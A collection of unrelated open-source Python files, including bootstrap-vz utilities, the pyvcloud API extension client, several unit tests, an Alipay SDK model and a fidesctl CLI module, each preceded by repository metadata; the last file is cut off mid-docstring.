67139
|
<gh_stars>100-1000
from .hypnograms import SparseHypnogram, DenseHypnogram
|
bootstrapvz/common/tools.py
|
zeridon/bootstrap-vz
| 207 |
67162
|
from __future__ import print_function
import os
def log_check_call(command, stdin=None, env=None, shell=False, cwd=None):
status, stdout, stderr = log_call(command, stdin, env, shell, cwd)
from subprocess import CalledProcessError
if status != 0:
e = CalledProcessError(status, ' '.join(command), '\n'.join(stderr))
# Fix Pyro4's fixIronPythonExceptionForPickle() by setting the args property,
# even though we use our own serialization (at least I think that's the problem).
# See bootstrapvz.remote.serialize_called_process_error for more info.
setattr(e, 'args', (status, ' '.join(command), '\n'.join(stderr)))
raise e
return stdout
def log_call(command, stdin=None, env=None, shell=False, cwd=None):
import subprocess
import logging
from multiprocessing.dummy import Pool as ThreadPool
from os.path import realpath
command_log = realpath(command[0]).replace('/', '.')
log = logging.getLogger(__name__ + command_log)
if isinstance(command, list):
log.debug('Executing: {command}'.format(command=' '.join(command)))
else:
log.debug('Executing: {command}'.format(command=command))
process = subprocess.Popen(args=command, env=env, shell=shell, cwd=cwd,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
if stdin is not None:
log.debug(' stdin: ' + stdin)
process.stdin.write(stdin + "\n")
process.stdin.flush()
process.stdin.close()
stdout = []
stderr = []
def handle_stdout(line):
log.debug(line)
stdout.append(line)
def handle_stderr(line):
log.error(line)
stderr.append(line)
handlers = {process.stdout: handle_stdout,
process.stderr: handle_stderr}
def stream_readline(stream):
for line in iter(stream.readline, ''):
handlers[stream](line.strip())
pool = ThreadPool(2)
pool.map(stream_readline, [process.stdout, process.stderr])
pool.close()
pool.join()
process.wait()
return process.returncode, stdout, stderr
def sed_i(file_path, pattern, subst, expected_replacements=1):
replacement_count = inline_replace(file_path, pattern, subst)
if replacement_count != expected_replacements:
from .exceptions import UnexpectedNumMatchesError
msg = ('There were {real} instead of {expected} matches for '
'the expression `{exp}\' in the file `{path}\''
.format(real=replacement_count, expected=expected_replacements,
exp=pattern, path=file_path))
raise UnexpectedNumMatchesError(msg)
def inline_replace(file_path, pattern, subst):
import fileinput
import re
replacement_count = 0
for line in fileinput.input(files=file_path, inplace=True):
(replacement, count) = re.subn(pattern, subst, line)
replacement_count += count
print(replacement, end='')
return replacement_count
def load_json(path):
import json
from json_minify import json_minify
with open(path) as stream:
return json.loads(json_minify(stream.read(), False))
def load_yaml(path):
import yaml
with open(path, 'r') as stream:
return yaml.safe_load(stream)
def load_data(path):
filename, extension = os.path.splitext(path)
if not os.path.isfile(path):
raise Exception('The path {path} does not point to a file.'.format(path=path))
if extension == '.json':
return load_json(path)
elif extension == '.yml' or extension == '.yaml':
return load_yaml(path)
else:
raise Exception('Unrecognized extension: {ext}'.format(ext=extension))
def config_get(path, config_path):
config = load_data(path)
for key in config_path:
config = config.get(key)
return config
def copy_tree(from_path, to_path):
from shutil import copy
for abs_prefix, dirs, files in os.walk(from_path):
prefix = os.path.normpath(os.path.relpath(abs_prefix, from_path))
for path in dirs:
full_path = os.path.join(to_path, prefix, path)
if os.path.exists(full_path):
if os.path.isdir(full_path):
continue
else:
os.remove(full_path)
os.mkdir(full_path)
for path in files:
copy(os.path.join(abs_prefix, path),
os.path.join(to_path, prefix, path))
def rel_path(base, path):
return os.path.normpath(os.path.join(os.path.dirname(base), path))
|
test/models/test_gin.py
|
rlckd159/deep-graph-matching-consensus
| 194 |
67179
|
from itertools import product
import torch
from dgmc.models import GIN
def test_gin():
model = GIN(16, 32, num_layers=2, batch_norm=True, cat=True, lin=True)
assert model.__repr__() == ('GIN(16, 32, num_layers=2, batch_norm=True, '
'cat=True, lin=True)')
x = torch.randn(100, 16)
edge_index = torch.randint(100, (2, 400), dtype=torch.long)
for cat, lin in product([False, True], [False, True]):
model = GIN(16, 32, 2, True, cat, lin)
out = model(x, edge_index)
assert out.size() == (100, 16 + 2 * 32 if not lin and cat else 32)
assert out.size() == (100, model.out_channels)
|
pyvcloud/vcd/api_extension.py
|
lrivallain/pyvcloud
| 168 |
67195
|
# VMware vCloud Director Python SDK
# Copyright (c) 2018 VMware, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import urllib
from pyvcloud.vcd.client import E
from pyvcloud.vcd.client import E_VMEXT
from pyvcloud.vcd.client import EntityType
from pyvcloud.vcd.client import QueryResultFormat
from pyvcloud.vcd.client import RelationType
from pyvcloud.vcd.client import ResourceType
from pyvcloud.vcd.exceptions import MissingRecordException
from pyvcloud.vcd.exceptions import MultipleRecordsException
from pyvcloud.vcd.exceptions import OperationNotSupportedException
from pyvcloud.vcd.utils import to_dict
class APIExtension(object):
ATTRIBUTES = [
'name', 'namespace', 'enabled', 'exchange', 'routingKey', 'priority',
'isAuthorizationEnabled', 'href', 'id'
]
def __init__(self, client):
"""Constructor for APIExtension object.
:param pyvcloud.vcd.client.Client client: the client that will be used
to make REST calls to vCD.
"""
self.client = client
def list_extensions(self):
"""Fetch the API extension services defined in the system.
:return: all the registered API extension services in the system.
:rtype: list
"""
try:
records = self.client.get_typed_query(
ResourceType.ADMIN_SERVICE.value,
query_result_format=QueryResultFormat.ID_RECORDS).execute()
except OperationNotSupportedException:
msg = 'User doesn\'t have permission to view extensions.'
raise OperationNotSupportedException(msg)
return [to_dict(r, self.ATTRIBUTES) for r in records]
def _get_extension_record(self,
name,
namespace=None,
format=QueryResultFormat.ID_RECORDS):
"""Fetch info about a particular API extension service as a record.
:param str name: the name of the extension service whose info we want
to retrieve.
:param str namespace: the namespace of the extension service. If
omitted, all extension services matching the given name will be
retrieved and that would lead to a MultipleRecordsException.
:param format QueryResultFormat: dictates whether id or href should be
part of the returned record. By default id is returned.
:return: the extension service record.
:rtype: lxml.objectify.ObjectifiedElement object containing
AdminServiceRecord XML data representing the service.
:raises MissingRecordException: if a service with the given name and
namespace couldn't be found.
:raise MultipleRecordsException: if more than one service with the
given name and namespace are found.
"""
qfilter = 'name==%s' % urllib.parse.quote(name)
if namespace is not None:
qfilter += ';namespace==%s' % urllib.parse.quote(namespace)
try:
ext = self.client.get_typed_query(
ResourceType.ADMIN_SERVICE.value,
qfilter=qfilter,
query_result_format=format).find_unique()
except OperationNotSupportedException:
msg = 'User doesn\'t have permission to interact with extensions.'
raise OperationNotSupportedException(msg)
except MissingRecordException:
msg = 'API Extension service (name:' + name
if namespace is not None:
msg += ', namespace:' + namespace
msg += ') not found.'
raise MissingRecordException(msg)
except MultipleRecordsException:
msg = 'Found multiple API Extension service with (name:' + name
if namespace is not None:
msg += ', namespace:' + namespace + ').'
else:
msg += '). Consider providing value for the namespace.'
raise MultipleRecordsException(msg)
return ext
def get_extension(self, name, namespace=None):
"""Fetch info about a particular API extension service.
:param str name: the name of the extension service whose info we want
to retrieve.
:param str namespace: the namespace of the extension service.
:return: information about the extension service.
:rtype: dict
:raises MissingRecordException: if a service with the given name and
namespace couldn't be found.
:raise MultipleRecordsException: if more than one service with the
given name and namespace are found.
"""
ext_record = self._get_extension_record(name, namespace)
return to_dict(ext_record, self.ATTRIBUTES)
def get_extension_xml(self, extension_id):
uri = f"{self.client.get_api_uri()}/admin/extension/service/{extension_id}" # noqa: E501
try:
response_xml = self.client.get_resource(uri)
return response_xml
except Exception as err:
raise Exception(f"Failed to get extension XML with error: {err}")
def get_extension_info(self, name, namespace=None):
"""Return info about an API extension, including filters.
:param str name: the name of the extension service whose info we want
to retrieve.
:param str namespace: the namespace of the extension service. If not
specified (i.e. = None), we will use the value passed in the
`name` parameter.
:return: information about the extension.
:rtype: dict
:raises MissingRecordException: if a service with the given name and
namespace couldn't be found.
:raise MultipleRecordsException: if more than one service with the
given name and namespace are found.
"""
ext = self.get_extension(name, namespace)
filters = self.get_api_filters(ext['id'])
n = 1
for f in filters:
ext['filter_%s' % n] = f.get('urlPattern')
n += 1
return ext
def update_extension(self, name, namespace=None, routing_key=None,
exchange=None, description=None):
"""Update properties for an existing API extension.
:param str name: name of the API extension.
:param str namespace: namespace of the API extension.
:param str routing_key: AMQP routing key to use for the extension.
:param str exchange: AMQP exchange to use for the extension.
:return: href of the API extension.
:rtype: str
:raises MissingRecordException: if an extension with the given name and
namespace couldn't be found.
:raise MultipleRecordsException: if more than one service with the
given name and namespace are found.
"""
record = self._get_extension_record(name=name,
namespace=namespace,
format=QueryResultFormat.RECORDS)
params = E_VMEXT.Service({'name': name})
description = description or record.get('description')
if description is not None:
params.append(E.Description(description))
params.append(E_VMEXT.Namespace(record.get('namespace')))
params.append(E_VMEXT.Enabled(record.get('enabled')))
params.append(E_VMEXT.RoutingKey(
routing_key if routing_key else record.get('routingKey')))
params.append(E_VMEXT.Exchange(
exchange if exchange else record.get('exchange')))
self.client.put_resource(record.get('href'), params, None)
return record.get('href')
def add_extension(self, name, namespace, routing_key, exchange, patterns,
description=None):
"""Add an API extension service.
:param str name: name of the new API extension service.
:param str namespace: namespace of the new API extension service.
:param str routing_key: AMQP routing key to use with the extension.
:param str exchange: AMQP exchange to use with the extension.
:param list patterns: list of url API filters to register with the
extension.
:return: object containing EntityType.ADMIN_SERVICE XML data i.e. the
sparse representation of the API extension.
:rtype: lxml.objectify.ObjectifiedElement
"""
params = E_VMEXT.Service({'name': name})
if description is not None:
params.append(E.Description(description))
params.append(E_VMEXT.Namespace(namespace))
params.append(E_VMEXT.Enabled('true'))
params.append(E_VMEXT.RoutingKey(routing_key))
params.append(E_VMEXT.Exchange(exchange))
filters = E_VMEXT.ApiFilters()
for pattern in patterns:
filters.append(
E_VMEXT.ApiFilter(E_VMEXT.UrlPattern(pattern.strip())))
params.append(filters)
ext = self.client.get_extension()
ext_services = self.client.get_linked_resource(
ext, RelationType.DOWN, EntityType.EXTENSION_SERVICES.value)
return self.client.post_linked_resource(ext_services, RelationType.ADD,
EntityType.ADMIN_SERVICE.value,
params)
def enable_extension(self, name, enabled=True, namespace=None):
"""Enable or disable an API extension service.
:param str name: the name of the extension service whose we want to
enable/disable.
:param str namespace: the namespace of the extension service. If not
specified (i.e. = None), we will use the value passed in the
`name` parameter.
:param bool enabled: flag to enable or disable the extension.
:return: href of the service being enabled/disabled.
:rtype: str
:raises MissingRecordException: if a service with the given name and
namespace couldn't be found.
:raise MultipleRecordsException: if more than one service with the
given name and namespace are found.
"""
record = self._get_extension_record(name=name,
namespace=namespace,
format=QueryResultFormat.RECORDS)
params = E_VMEXT.Service({'name': name})
params.append(E_VMEXT.Namespace(record.get('namespace')))
params.append(E_VMEXT.Enabled('true' if enabled else 'false'))
params.append(E_VMEXT.RoutingKey(record.get('routingKey')))
params.append(E_VMEXT.Exchange(record.get('exchange')))
self.client.put_resource(record.get('href'), params, None)
return record.get('href')
def delete_extension(self, name, namespace):
"""Delete an API extension service.
:param str name: the name of the extension service whose we want to
delete.
:param str namespace: the namespace of the extension service. If not
specified (i.e. = None), we will use the value passed in the
`name` parameter.
:raises MissingRecordException: if a service with the given name and
namespace couldn't be found.
:raise MultipleRecordsException: if more than one service with the
given name and namespace are found.
"""
href = self.enable_extension(name, enabled=False, namespace=namespace)
return self.client.delete_resource(href)
def get_api_filters(self, service_id, format=QueryResultFormat.ID_RECORDS):
"""Fetch the API filters defined for the service.
:param str service_id: the id of the extension service.
:param format QueryResultFormat: dictates whether id or href should be
part of the returned record. By default id is returned.
:return: API filters registered for the API extension.
:rtype: generator object
"""
try:
records = self.client.get_typed_query(
ResourceType.API_FILTER.value,
equality_filter=('service', service_id),
query_result_format=format).execute()
except OperationNotSupportedException:
msg = 'User doesn\'t have permission to view api filters.'
raise OperationNotSupportedException(msg)
return records
def remove_all_api_filters_from_service(self, name, namespace=None):
"""."""
ext_record = self._get_extension_record(name=name, namespace=namespace)
api_filter_records = self.get_api_filters(
service_id=ext_record.get('id'),
format=QueryResultFormat.REFERENCES)
for record in api_filter_records:
api_filter = self.client.get_resource(uri=record.get('href'))
self.client.delete_linked_resource(
resource=api_filter, rel=RelationType.REMOVE, media_type=None)
def add_api_filters_to_service(self, name, patterns, namespace=None):
"""."""
ext_record = self._get_extension_record(
name=name, namespace=namespace,
format=QueryResultFormat.REFERENCES)
ext = self.client.get_resource(uri=ext_record.get('href'))
for pattern in patterns:
api_filter = E_VMEXT.ApiFilter(E_VMEXT.UrlPattern(pattern.strip()))
self.client.post_linked_resource(
resource=ext, rel=RelationType.ADD,
media_type=EntityType.API_FILTER.value, contents=api_filter)
def add_service_right(self, right_name, service_name, namespace,
description, category, bundle_key):
"""Add a new right using API extension service.
:param str right_name: the name of the new right to be registered.
:param str service_name: the name of the extension service whose
record we want to retrieve.
:param str namespace: the namespace of the extension service.
:param str description: brief description about the new right.
:param str category: add the right in existing categories in
vCD Roles and Rights or specify a new category name.
:param str bundle_key: is used to identify the right name and change
its value to different languages using localization bundle.
:return: object containing EntityType.RIGHT XML data i.e. the
sparse representation of the Right element.
:rtype: lxml.objectify.ObjectifiedElement
"""
params = E.Right({'name': right_name})
params.append(E.Description(description))
params.append(E.Category(category))
params.append(E.BundleKey(bundle_key))
record = self._get_extension_record(name=service_name,
namespace=namespace,
format=QueryResultFormat.RECORDS)
ext_service = self.client.get_resource(record.get('href'))
ext_rights = self.client.get_linked_resource(ext_service,
RelationType.RIGHTS,
EntityType.RIGHTS.value)
return self.client.post_linked_resource(ext_rights,
RelationType.ADD,
EntityType.RIGHT.value,
params)
|
tests/utils/test_extendable_enum.py
|
ZackPashkin/toloka-kit
| 153 |
67209
|
<gh_stars>100-1000
import pytest
from enum import Enum
from toloka.client._converter import converter
from toloka.util._extendable_enum import extend_enum, ExtendableStrEnum
from toloka.client.primitives.base import BaseTolokaObject
@pytest.fixture
def test_enum():
class TestEnum(Enum):
A = 'a'
B = 'b'
return TestEnum
@pytest.fixture
def test_extendable_enum():
class TestExtendableEnum(ExtendableStrEnum):
A = 'a'
B = 'b'
return TestExtendableEnum
@pytest.mark.parametrize(
['name', 'value', 'is_new'],
[
('A', 'b', False),
('C', 'a', False),
('C', 'c', True)
]
)
def test_extend_enum(test_enum, name, value, is_new):
enum_len = len(test_enum)
new_member = extend_enum(test_enum, name, value)
if is_new:
assert new_member and new_member.name == name and new_member.value == value
assert len(test_enum) == enum_len + 1
else:
assert new_member and (new_member.name == name or new_member.value == value)
assert len(test_enum) == enum_len
def test_extendable_str_enum(test_extendable_enum):
assert test_extendable_enum.A.value == 'a'
assert test_extendable_enum.C
assert test_extendable_enum.C.name == 'C'
assert test_extendable_enum.C.value == 'C'
# get by value
assert test_extendable_enum('D')
assert test_extendable_enum.D.name == 'D'
assert test_extendable_enum.D.value == 'D'
assert test_extendable_enum(test_extendable_enum.E)
assert test_extendable_enum.E.name == 'E'
assert test_extendable_enum.E.value == 'E'
# get by name
assert test_extendable_enum['F']
assert test_extendable_enum.F.name == 'F'
assert test_extendable_enum.F.value == 'F'
def test_extendable_str_enum_structure(test_extendable_enum):
result = converter.structure('a', test_extendable_enum)
assert result and result.name == 'A' and result.value == 'a'
result = converter.structure('new_key', test_extendable_enum)
assert result and result.name == 'new_key' and result.value == 'new_key'
def test_extendable_str_enum_unstructure(test_extendable_enum):
assert converter.unstructure(test_extendable_enum.A) == 'a'
assert converter.unstructure(test_extendable_enum.D) == 'D'
def test_variant_type():
class MyEnum(ExtendableStrEnum):
DOG = 'dog'
CAT = 'cat'
class Animal(BaseTolokaObject, spec_enum=MyEnum, spec_field='type'):
pass
class Dog(Animal, spec_value=MyEnum.DOG):
pass
class Cat(Animal, spec_value=MyEnum.CAT):
pass
assert converter.structure({'type': 'dog'}, Animal) == Dog()
assert converter.structure({'type': 'cat'}, Animal) == Cat()
assert Dog().unstructure() == {'type': 'dog'}
assert Cat().unstructure() == {'type': 'cat'}
def test_empty_structure(test_enum, test_extendable_enum):
class MyClass(BaseTolokaObject):
enum_field: test_enum
extendable_enum_field: test_extendable_enum
assert MyClass.structure({}) == MyClass()
|
alipay/aop/api/domain/AlipayEbppIndustryBillNettingRefundModel.py
|
snowxmas/alipay-sdk-python-all
| 213 |
67213
|
<filename>alipay/aop/api/domain/AlipayEbppIndustryBillNettingRefundModel.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import json
from alipay.aop.api.constant.ParamConstants import *
from alipay.aop.api.domain.IndustryExtendField import IndustryExtendField
class AlipayEbppIndustryBillNettingRefundModel(object):
def __init__(self):
self._alipay_bill_no = None
self._industry_extend_field_list = None
self._memo = None
self._netting_amount = None
self._scene = None
@property
def alipay_bill_no(self):
return self._alipay_bill_no
@alipay_bill_no.setter
def alipay_bill_no(self, value):
self._alipay_bill_no = value
@property
def industry_extend_field_list(self):
return self._industry_extend_field_list
@industry_extend_field_list.setter
def industry_extend_field_list(self, value):
if isinstance(value, list):
self._industry_extend_field_list = list()
for i in value:
if isinstance(i, IndustryExtendField):
self._industry_extend_field_list.append(i)
else:
self._industry_extend_field_list.append(IndustryExtendField.from_alipay_dict(i))
@property
def memo(self):
return self._memo
@memo.setter
def memo(self, value):
self._memo = value
@property
def netting_amount(self):
return self._netting_amount
@netting_amount.setter
def netting_amount(self, value):
self._netting_amount = value
@property
def scene(self):
return self._scene
@scene.setter
def scene(self, value):
self._scene = value
def to_alipay_dict(self):
params = dict()
if self.alipay_bill_no:
if hasattr(self.alipay_bill_no, 'to_alipay_dict'):
params['alipay_bill_no'] = self.alipay_bill_no.to_alipay_dict()
else:
params['alipay_bill_no'] = self.alipay_bill_no
if self.industry_extend_field_list:
if isinstance(self.industry_extend_field_list, list):
for i in range(0, len(self.industry_extend_field_list)):
element = self.industry_extend_field_list[i]
if hasattr(element, 'to_alipay_dict'):
self.industry_extend_field_list[i] = element.to_alipay_dict()
if hasattr(self.industry_extend_field_list, 'to_alipay_dict'):
params['industry_extend_field_list'] = self.industry_extend_field_list.to_alipay_dict()
else:
params['industry_extend_field_list'] = self.industry_extend_field_list
if self.memo:
if hasattr(self.memo, 'to_alipay_dict'):
params['memo'] = self.memo.to_alipay_dict()
else:
params['memo'] = self.memo
if self.netting_amount:
if hasattr(self.netting_amount, 'to_alipay_dict'):
params['netting_amount'] = self.netting_amount.to_alipay_dict()
else:
params['netting_amount'] = self.netting_amount
if self.scene:
if hasattr(self.scene, 'to_alipay_dict'):
params['scene'] = self.scene.to_alipay_dict()
else:
params['scene'] = self.scene
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = AlipayEbppIndustryBillNettingRefundModel()
if 'alipay_bill_no' in d:
o.alipay_bill_no = d['alipay_bill_no']
if 'industry_extend_field_list' in d:
o.industry_extend_field_list = d['industry_extend_field_list']
if 'memo' in d:
o.memo = d['memo']
if 'netting_amount' in d:
o.netting_amount = d['netting_amount']
if 'scene' in d:
o.scene = d['scene']
return o
|
terrascript/spotinst/__init__.py
|
hugovk/python-terrascript
| 507 |
67266
|
# terrascript/spotinst/__init__.py
import terrascript
class spotinst(terrascript.Provider):
pass
|
wetectron/data/transforms/build.py
|
akobiisr/wetectron
| 332 |
67270
|
# --------------------------------------------------------
# Copyright (C) 2020 NVIDIA Corporation. All rights reserved.
# Nvidia Source Code License-NC
# --------------------------------------------------------
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import torch
from . import transforms as T
_imagenet_pca = {
'eigval': torch.Tensor([0.2175, 0.0188, 0.0045]),
'eigvec': torch.Tensor([
[-0.5675, 0.7192, 0.4009],
[-0.5808, -0.0045, -0.8140],
[-0.5836, -0.6948, 0.4203],
])
}
def build_transforms(cfg, is_train=True):
if is_train:
min_size = cfg.INPUT.MIN_SIZE_TRAIN
max_size = cfg.INPUT.MAX_SIZE_TRAIN
flip_horizontal_prob = 0.5 # cfg.INPUT.FLIP_PROB_TRAIN
flip_vertical_prob = cfg.INPUT.VERTICAL_FLIP_PROB_TRAIN
brightness = cfg.INPUT.BRIGHTNESS
contrast = cfg.INPUT.CONTRAST
saturation = cfg.INPUT.SATURATION
hue = cfg.INPUT.HUE
else:
min_size = cfg.INPUT.MIN_SIZE_TEST
max_size = cfg.INPUT.MAX_SIZE_TEST
flip_horizontal_prob = 0.0
flip_vertical_prob = 0.0
brightness = 0.0
contrast = 0.0
saturation = 0.0
hue = 0.0
to_bgr255 = cfg.INPUT.TO_BGR255
normalize_transform = T.Normalize(
mean=cfg.INPUT.PIXEL_MEAN, std=cfg.INPUT.PIXEL_STD, to_bgr255=to_bgr255
)
color_jitter = T.ColorJitter(
brightness=brightness,
contrast=contrast,
saturation=saturation,
hue=hue,
)
if cfg.INPUT.PCA:
transform = T.Compose(
[
color_jitter,
T.Resize(min_size, max_size),
T.RandomHorizontalFlip(flip_horizontal_prob),
T.RandomVerticalFlip(flip_vertical_prob),
T.ToTensor(),
T.Lighting(0.1, _imagenet_pca['eigval'], _imagenet_pca['eigvec']),
normalize_transform,
]
)
else:
transform = T.Compose(
[
color_jitter,
T.Resize(min_size, max_size),
T.RandomHorizontalFlip(flip_horizontal_prob),
T.RandomVerticalFlip(flip_vertical_prob),
T.ToTensor(),
normalize_transform,
]
)
return transform
|
Chapter10/url_response_header.py
|
add54/ADMIN_SYS_PYTHON
| 116 |
67290
|
<reponame>add54/ADMIN_SYS_PYTHON
import urllib.request
x = urllib.request.urlopen('https://www.imdb.com/')
print(x.info())
|
deepchem/dock/tests/test_pose_scoring.py
|
cjgalvin/deepchem
| 3,782 |
67296
|
<filename>deepchem/dock/tests/test_pose_scoring.py
"""
Tests for Pose Scoring
"""
import logging
import unittest
import numpy as np
from deepchem.dock.pose_scoring import vina_nonlinearity
from deepchem.dock.pose_scoring import vina_hydrophobic
from deepchem.dock.pose_scoring import vina_gaussian_first
from deepchem.dock.pose_scoring import vina_gaussian_second
from deepchem.dock.pose_scoring import vina_hbond
from deepchem.dock.pose_scoring import vina_repulsion
from deepchem.dock.pose_scoring import cutoff_filter
from deepchem.dock.pose_scoring import vina_energy_term
logger = logging.getLogger(__name__)
class TestPoseScoring(unittest.TestCase):
"""
Does sanity checks on pose generation.
"""
def test_cutoff_filter(self):
N = 10
M = 5
d = np.ones((N, M))
x = np.random.rand(N, M)
cutoff_dist = 0.5
x_thres = cutoff_filter(d, x, cutoff=cutoff_dist)
assert (x_thres == np.zeros((N, M))).all()
def test_vina_nonlinearity(self):
N = 10
M = 5
c = np.random.rand(N, M)
Nrot = 5
w = 0.5
out_tensor = vina_nonlinearity(c, w, Nrot)
assert out_tensor.shape == (N, M)
assert (out_tensor == c / (1 + w * Nrot)).all()
def test_vina_repulsion(self):
N = 10
M = 5
d = np.ones((N, M))
out_tensor = vina_repulsion(d)
assert out_tensor.shape == (N, M)
# Where d is greater than zero, the repulsion is just zeros
assert (out_tensor == np.zeros_like(d)).all()
def test_vina_hydrophobic(self):
N = 10
M = 5
d = np.zeros((N, M))
out_tensor = vina_hydrophobic(d)
assert out_tensor.shape == (N, M)
# When d is 0, this should just be 1
assert (out_tensor == np.ones_like(d)).all()
def test_vina_hbond(self):
N = 10
M = 5
d = np.zeros((N, M))
out_tensor = vina_hbond(d)
assert out_tensor.shape == (N, M)
# When d == 0, the hbond interaction is 0
assert (out_tensor == np.zeros_like(d)).all()
def test_vina_gaussian(self):
N = 10
M = 5
d = np.zeros((N, M))
out_tensor = vina_gaussian_first(d)
assert out_tensor.shape == (N, M)
# The exponential returns 1 when input 0.
assert (out_tensor == np.ones_like(d)).all()
d = 3 * np.ones((N, M))
out_tensor = vina_gaussian_second(d)
assert out_tensor.shape == (N, M)
# This exponential returns 1 when input 3
assert (out_tensor == np.ones_like(d)).all()
def test_energy_term(self):
N = 10
M = 5
coords1 = np.random.rand(N, 3)
coords2 = np.random.rand(M, 3)
weights = np.ones((5,))
wrot = 1.0
Nrot = 3
energy = vina_energy_term(coords1, coords2, weights, wrot, Nrot)
assert energy > 0
|
tests/gen_vectors/gen_uint128_intrinsics_vectors.py
|
cryspen/hacl-star
| 201 |
67311
|
import os
import random
import itertools
vector_template = '''static uint64_t {}[{}] =
{{
{}
}};
'''
max_u64 = 0xffffffffffffffff
max_u64_str = str(hex(max_u64))
def get_random_u64 (size):
return '0x' + (os.urandom(size).hex() if size != 0 else '0')
def print_vectors (name, l):
return vector_template.format(name, str(len(l)), ',\n '.join(l))
def main():
edge_cases = itertools.product(
['0x0', max_u64_str], ['0x0', max_u64_str], ['0x0', '0x1'])
# (size of a, size of b, number of vectors to generate)
configs = [(0,1,10), (1,1,10), (2,2,10), (2,3,10), (3,4,10), (4,4,10),
(5,4,10), (4,5,10), (6,6,10), (7,7,10), (8,8,20)]
a_vectors = []
b_vectors = []
cin_vectors = []
addcarry_res_vectors = []
addcarry_cout_vectors = []
subborrow_res_vectors = []
subborrow_cout_vectors = []
def compute_vector(a, b, cin):
a_vectors.append(a)
b_vectors.append(b)
cin_vectors.append(cin)
addition = int(a, 16) + int(b, 16) + int(cin, 16)
cout = addition // (max_u64 + 1)
res = addition % (max_u64 + 1)
res = max_u64 if res < 0 else res
addcarry_res_vectors.append(hex(res))
addcarry_cout_vectors.append(hex(cout))
subtraction = int(a, 16) - int(b, 16) - int(cin, 16)
if subtraction >= 0:
res = subtraction
cout = 0
else:
res = max_u64 + subtraction + 1
cout = 1
subborrow_res_vectors.append(hex(res))
subborrow_cout_vectors.append(hex(cout))
for c in edge_cases:
compute_vector(*c)
for c in configs:
for i in range(c[2]):
a = get_random_u64(c[0])
b = get_random_u64(c[1])
cin = '0x' + str(random.randint(0,1))
compute_vector(a, b, cin)
with open('uint128-intrinsics_vectors.h', 'w') as f:
f.write('static uint32_t num_vectors = {};\n\n'.format(len(a_vectors)))
f.write(print_vectors('a_vectors', a_vectors))
f.write(print_vectors('b_vectors', b_vectors))
f.write(print_vectors('cin_vectors', cin_vectors))
f.write(print_vectors('addcarry_res_vectors', addcarry_res_vectors))
f.write(print_vectors('addcarry_cout_vectors', addcarry_cout_vectors))
f.write(print_vectors('subborrow_res_vectors', subborrow_res_vectors))
f.write(print_vectors('subborrow_cout_vectors', subborrow_cout_vectors))
main ()
|
src/genie/libs/parser/iosxe/tests/ShowRunInterface/cli/equal/golden_output12_expected.py
|
balmasea/genieparser
| 204 |
67314
|
<reponame>balmasea/genieparser<filename>src/genie/libs/parser/iosxe/tests/ShowRunInterface/cli/equal/golden_output12_expected.py
expected_output={
"interfaces": {
"Tunnel100": {
"autoroute_announce": "enabled",
"src_ip": "Loopback0",
"tunnel_bandwidth": 500,
"tunnel_dst": "2.2.2.2",
"tunnel_mode": "mpls traffic-eng",
"tunnel_path_option": {
"1": {
"path_type": "dynamic"
}
},
"tunnel_priority": [
"7 7"
]
}
}
}
|
src/fidesctl/cli/commands/generate.py
|
ethyca/fides
| 153 |
67321
|
<filename>src/fidesctl/cli/commands/generate.py
"""Contains the generate group of CLI commands for Fidesctl."""
import click
from fidesctl.cli.options import (
aws_access_key_id_option,
aws_region_option,
aws_secret_access_key_option,
connection_string_option,
credentials_id_option,
include_null_flag,
okta_org_url_option,
okta_token_option,
)
from fidesctl.cli.utils import (
handle_aws_credentials_options,
handle_database_credentials_options,
handle_okta_credentials_options,
with_analytics,
)
from fidesctl.core import dataset as _dataset
from fidesctl.core import system as _system
@click.group(name="generate")
@click.pass_context
def generate(ctx: click.Context) -> None:
"""
Generate fidesctl resource types
"""
@generate.group(name="dataset")
@click.pass_context
def generate_dataset(ctx: click.Context) -> None:
"""
Generate fidesctl Dataset resources
"""
@generate_dataset.command(name="db")
@click.pass_context
@click.argument("output_filename", type=str)
@credentials_id_option
@connection_string_option
@include_null_flag
@with_analytics
def generate_dataset_db(
ctx: click.Context,
output_filename: str,
connection_string: str,
credentials_id: str,
include_null: bool,
) -> None:
"""
Connect to a database directly via a SQLAlchemy-style connection string and
generate a dataset manifest file that consists of every schema/table/field.
Connection string can be supplied as an option or a credentials reference
to fidesctl config.
This is a one-time operation that does not track the state of the database.
It will need to be run again if the database schema changes.
"""
actual_connection_string = handle_database_credentials_options(
fides_config=ctx.obj["CONFIG"],
connection_string=connection_string,
credentials_id=credentials_id,
)
_dataset.generate_dataset_db(
connection_string=actual_connection_string,
file_name=output_filename,
include_null=include_null,
)
@generate.group(name="system")
@click.pass_context
def generate_system(ctx: click.Context) -> None:
"""
Generate fidesctl System resources
"""
@generate_system.command(name="okta")
@click.pass_context
@click.argument("output_filename", type=str)
@credentials_id_option
@okta_org_url_option
@okta_token_option
@include_null_flag
@with_analytics
def generate_system_okta(
ctx: click.Context,
output_filename: str,
credentials_id: str,
token: str,
org_url: str,
include_null: bool,
) -> None:
"""
Generates systems for your Okta applications. Connect to an Okta admin
account by providing an organization url and auth token or a credentials
reference to fidesctl config. Auth token and organization url can also
be supplied by setting environment variables as defined by the okta python sdk.
This is a one-time operation that does not track the state of the okta resources.
It will need to be run again if the tracked resources change.
"""
okta_config = handle_okta_credentials_options(
fides_config=ctx.obj["CONFIG"],
token=token,
org_url=org_url,
credentials_id=credentials_id,
)
_system.generate_system_okta(
okta_config=okta_config,
file_name=output_filename,
include_null=include_null,
)
@generate_system.command(name="aws")
@click.pass_context
@click.argument("output_filename", type=str)
@credentials_id_option
@aws_access_key_id_option
@aws_secret_access_key_option
@aws_region_option
@include_null_flag
@click.option("-o", "--organization", type=str, default="default_organization")
@with_analytics
def generate_system_aws(
ctx: click.Context,
output_filename: str,
include_null: bool,
organization: str,
credentials_id: str,
access_key_id: str,
secret_access_key: str,
region: str,
) -> None:
"""
Connect to an aws account and generate a system manifest file that consists of every
tracked resource.
Credentials can be supplied as options, a credentials
